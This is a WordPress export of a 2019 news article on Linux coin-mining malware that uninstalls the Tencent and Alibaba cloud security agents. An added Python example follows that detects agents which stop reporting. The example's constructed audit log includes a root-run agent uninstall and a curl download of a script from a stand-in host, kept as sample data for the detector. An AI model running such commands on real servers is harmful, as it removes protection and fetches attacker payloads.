{"id":37370,"date":"2019-01-18T11:06:19","date_gmt":"2019-01-18T11:06:19","guid":{"rendered":"http:\/\/icloud.pe\/blog\/?guid=75bcdac0ab611e6d9cc715b8cdff7135"},"modified":"2019-01-18T11:06:19","modified_gmt":"2019-01-18T11:06:19","slug":"cloud-security-products-uninstalled-by-mutating-malware","status":"publish","type":"post","link":"https:\/\/icloud.pe\/blog\/cloud-security-products-uninstalled-by-mutating-malware\/","title":{"rendered":"Cloud security products uninstalled by mutating malware"},"content":{"rendered":"<p><span class=\"field field-name-field-author field-type-node-reference field-label-hidden\"><br \/>\n      <span class=\"field-item even\"><a href=\"https:\/\/www.cloudpro.co.uk\/authors\/connor-jones\">Connor Jones<\/a><\/span><br \/>\n  <\/span><\/p>\n<div class=\"field field-name-field-published-date field-type-datetime field-label-hidden\">\n<div class=\"field-items\">\n<div class=\"field-item even\"><span class=\"date-display-single\">18 Jan, 2019<\/span><\/div>\n<\/div>\n<\/div>\n<div class=\"field field-name-body\">\n<p>Unit 42, the global cyber threat intelligence arm of Palo Alto Networks, has discovered new forms of a Linux coin-mining malware originally used by the Rocke group, which attacks Linux servers, a platform that accounts for a large share of the world&#8217;s servers.<\/p>\n<p>The malware, which is believed to be related to the Xbash malware detected in September 2018, will infect a <a href=\"https:\/\/www.cloudpro.co.uk\/it-infrastructure\/cloud-storage\/7885\/unsecured-server-reveals-years-worth-of-fbi-investigations\" >server<\/a> and then mutate, downloading new code that lets it act with administrative (root) privileges and uninstall the cloud security agents installed on the server.<\/p>\n<p>The security products weren&#8217;t compromised or bypassed by an exploit; instead, the threat actor was able to simply remove them from the server altogether, in the same way a legitimate system administrator with root access would.<\/p>\n<p>The samples analysed by Unit 42 targeted the security products of two of China&#8217;s leading cloud providers: Tencent Cloud and <a href=\"https:\/\/www.cloudpro.co.uk\/alibaba\" >Alibaba Cloud<\/a> (Aliyun). It&#8217;s also <a href=\"https:\/\/unit42.paloaltonetworks.com\/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products\/\" >believed by the threat intelligence team<\/a> that the analysed samples are the first family of malware seen to target and uninstall cloud security products from compromised servers.<\/p>\n<p>The threat isn&#8217;t only to the Linux hosts themselves. Cloud Workload Protection Platforms (CWPPs), the agent-based security services that cloud providers build into their products to detect and stop malware on customer workloads, are also under threat: an attacker who already holds root on the host can simply uninstall the agent.<\/p>\n<p>The threat is worth taking seriously. Tencent Cloud and Alibaba Cloud (Aliyun) both include CWPPs with their products, and the latest campaign, which attempted to mine Monero on the infected Linux hosts, shows that a bundled agent on its own is not enough to mitigate such attacks.<\/p>\n<p>The Xbash family of <a href=\"https:\/\/www.cloudpro.co.uk\/it-infrastructure\/security\/7436\/its-time-to-wake-up-to-the-cloud-malware-threat\" >malware<\/a>, first discovered in September 2018, is devastating: analysed samples spread between servers in worm-like fashion and destroy data on the server while posing as ransomware. Researchers found no evidence in the attack code of any provision for restoring the data once the ransom was paid.<\/p>\n<p>Linux is more prevalent than one might think. A large share of Microsoft Azure virtual machines now run Linux, so it&#8217;s not just the Chinese cloud environments that are hosted on <a href=\"https:\/\/www.cloudpro.co.uk\/leadership\/cloud-essentials\/7266\/barcelona-to-ditch-microsoft-in-favour-of-open-source-linux\" >Linux<\/a>; it&#8217;s likely that your business is running at least one cloud service on a Linux server too.<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Connor Jones<\/p>\n<p>18 Jan, 2019<\/p>\n<p>Unit 42, the global cyber threat intelligence arm of Palo Alto Networks, has discovered new forms of a Linux coin-mining malware originally used by the Rocke group, which attacks Linux servers, &#8230;<\/p>\n","protected":false},"author":507,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-37370","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/posts\/37370","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/users\/507"}],"replies":[{"embeddable":true,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/comments?post=37370"}],"version-history":[{"count":1,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/posts\/37370\/revisions"}],"predecessor-version":[{"id":37371,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/posts\/37370\/revisions\/37371"}],"wp:attachment":[{"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/media?
parent=37370"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/categories?post=37370"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/icloud.pe\/blog\/wp-json\/wp\/v2\/tags?post=37370"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
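Because the agents in the article were removed with ordinary administrative actions rather than exploited, the compromised host cannot be relied on to report the removal itself; the check has to run where the attacker holds no root, in the control plane that receives the agents' heartbeats. The following is an added example of that check in Python. It is not code from the article, from Unit 42, or from Tencent Cloud or Alibaba Cloud: it takes a host inventory, the agents' heartbeat log and an off-host audit log of executed commands, flags inventory hosts whose agent has gone silent or never reported at all, and lists the root commands run on each such host since its last heartbeat. The log formats, host names, the agent name "hostguard", the uninstall script path and the download URL are assumptions constructed for the example.

```python
"""Control-plane check for cloud security agents that stop reporting.

Added example for this article; not code from the article, Unit 42, Tencent
Cloud or Alibaba Cloud. The log formats, host names, the agent name
"hostguard", the uninstall script path and the download URL are assumptions.
"""
import re
from datetime import datetime, timedelta, timezone

# Constructed heartbeat log as the control plane would receive it (format assumed).
HEARTBEAT_LOG = """\
2019-01-18T10:00:00Z web-01 hostguard heartbeat ok
2019-01-18T10:00:00Z web-02 hostguard heartbeat ok
2019-01-18T10:05:00Z web-01 hostguard heartbeat ok
2019-01-18T10:05:00Z web-02 hostguard heartbeat ok
2019-01-18T10:10:00Z web-01 hostguard heartbeat ok
2019-01-18T10:15:00Z web-01 hostguard heartbeat ok
"""

# Constructed audit log of executed commands, shipped off-host so that root on
# the box cannot erase it (format, paths and URL assumed for illustration).
AUDIT_LOG = """\
2019-01-18T10:06:12Z web-02 uid=0 argv="/opt/hostguard/uninstall.sh"
2019-01-18T10:07:40Z web-02 uid=0 argv="curl -fsSL http://203.0.113.5/x.sh"
2019-01-18T10:09:00Z web-01 uid=1000 argv="vim /etc/nginx/nginx.conf"
2019-01-18T10:12:30Z web-01 uid=0 argv="apt-get upgrade -y"
"""

# Hosts the inventory says must run the agent. db-01 never reported at all,
# which is the case an alert driven only by the agent's own events would miss.
INVENTORY = ["web-01", "web-02", "db-01"]

HEARTBEAT_RE = re.compile(r"^(\S+) (\S+) hostguard heartbeat ok$")
AUDIT_RE = re.compile(r'^(\S+) (\S+) uid=(\d+) argv="(.*)"$')


def parse_ts(stamp):
    """Parse an ISO-8601 UTC timestamp such as 2019-01-18T10:06:12Z."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def last_heartbeats(log):
    """Map each host to the time of its most recent agent check-in."""
    seen = {}
    for line in log.splitlines():
        m = HEARTBEAT_RE.match(line)
        if m:
            ts, host = parse_ts(m.group(1)), m.group(2)
            if host not in seen or ts > seen[host]:
                seen[host] = ts
    return seen


def silent_hosts(inventory, seen, now, max_gap_minutes):
    """Inventory hosts whose agent has not checked in within the gap, or ever."""
    gap = timedelta(minutes=max_gap_minutes)
    return sorted(h for h in inventory if h not in seen or now - seen[h] > gap)


def root_commands_after(log, host, since):
    """(timestamp, argv) of uid-0 commands on host at or after `since` (None = all)."""
    hits = []
    for line in log.splitlines():
        m = AUDIT_RE.match(line)
        if not m:
            continue
        stamp, h, uid, argv = m.group(1), m.group(2), int(m.group(3)), m.group(4)
        if h == host and uid == 0 and (since is None or parse_ts(stamp) >= since):
            hits.append((stamp, argv))
    return hits


def investigate(inventory, heartbeat_log, audit_log, now_iso, max_gap_minutes):
    """Silent hosts mapped to the root commands run since their last heartbeat."""
    seen = last_heartbeats(heartbeat_log)
    now = parse_ts(now_iso)
    return {host: root_commands_after(audit_log, host, seen.get(host))
            for host in silent_hosts(inventory, seen, now, max_gap_minutes)}


if __name__ == "__main__":
    report = investigate(INVENTORY, HEARTBEAT_LOG, AUDIT_LOG, "2019-01-18T10:20:00Z", 10)
    for host, commands in report.items():
        print(f"{host}: agent silent; root commands since last heartbeat:")
        for stamp, argv in commands or [("-", "none recorded")]:
            print(f"  {stamp}  {argv}")
```

Run as a script with the constructed logs, it reports web-02 (silent since 10:05, with a root-run uninstall script and a curl download recorded after its last heartbeat) and db-01 (in the inventory but never seen). web-01 is not reported even though root also ran a command there, because its agent is still checking in: the heartbeat gap, not root activity on its own, is what drives the alert, and the root commands are pulled in only to explain a gap that already exists.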